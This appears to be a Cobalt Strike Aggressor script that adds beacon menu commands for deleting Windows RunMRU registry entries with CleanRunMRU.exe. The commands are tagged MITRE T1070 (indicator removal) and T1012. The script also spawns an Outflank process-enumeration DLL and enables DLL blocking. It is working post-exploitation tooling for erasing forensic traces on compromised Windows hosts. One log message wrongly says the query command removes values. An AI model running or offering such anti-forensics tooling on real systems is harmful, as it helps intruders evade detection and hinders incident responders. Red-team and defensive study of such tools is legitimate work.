####################################################

# Cleaning MRU Values by n00bRage, n173hawk, syn from 0xThirteen (Thanks, Steve!!!)

###################################################


# Remove All MRU Values
item "Clean All Values from MRU - T1070"{

    local('$bid');
        foreach $bid ($1){
            cleanallmru($bid);
      }
    }


# Remove Singular MRU Values
item "Clean Single Value from MRU - T1070"{

    local('$bid');
        foreach $bid ($1){
            clearsinglemruvalue($bid);
      }
    }

item "Query MRU Values in Registry - T1012"{

    local('$bid');
        foreach $bid ($1){
            querymru($bid);
      }
    }



  
  
  
####################################################

# Cleaning MRU Values by n00bRage, n173hawk, syn

###################################################

sub cleanallmru{
blog($bid, "Removing all MRU Values with - https://github.com/0xthirteen/CleanRunMRU");
bexecute_assembly($1, script_resource('exe/CleanRunMRU.exe'), "clearall");
}

sub clearsinglemruvalue{
prompt_text("Which MRU Value do you want to remove?", "", lambda({
bexecute_assembly($bids, script_resource('exe/CleanRunMRU.exe'), "command=$1");
}, $bids => $1));
}

sub querymru{
blog($bid, "Removing all MRU Values with - https://github.com/0xthirteen/CleanRunMRU");
bexecute_assembly($1, script_resource('exe/CleanRunMRU.exe'), "query");
}



sub psx {
    $bid = $1;

    blog($bid, "Enumerating processes.");
    bdllspawn($bid, script_resource("/exe/Outflank-PsX.dll"), "", "PsX", 5000, false);
    return;
}


sub blockdlls {
bblockdlls($1);
}  
